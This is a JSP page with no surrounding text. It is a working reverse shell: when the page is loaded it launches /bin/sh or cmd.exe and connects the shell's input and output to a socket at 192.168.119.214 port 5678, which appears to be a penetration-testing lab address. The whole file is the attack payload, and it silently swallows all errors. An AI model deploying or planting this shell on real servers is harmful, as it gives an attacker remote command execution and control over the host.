<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
  class StreamConnector extends Thread
  {
    InputStream lw;
    OutputStream dk;

    StreamConnector( InputStream lw, OutputStream dk )
    {
      this.lw = lw;
      this.dk = dk;
    }

    public void run()
    {
      BufferedReader la  = null;
      BufferedWriter fvo = null;
      try
      {
        la  = new BufferedReader( new InputStreamReader( this.lw ) );
        fvo = new BufferedWriter( new OutputStreamWriter( this.dk ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = la.read( buffer, 0, buffer.length ) ) > 0 )
        {
          fvo.write( buffer, 0, length );
          fvo.flush();
        }
      } catch( Exception e ){}
      try
      {
        if( la != null )
          la.close();
        if( fvo != null )
          fvo.close();
      } catch( Exception e ){}
    }
  }

  try
  {
    String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
  ShellPath = new String("/bin/sh");
} else {
  ShellPath = new String("cmd.exe");
}

    Socket socket = new Socket( "192.168.119.214", 5678 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>
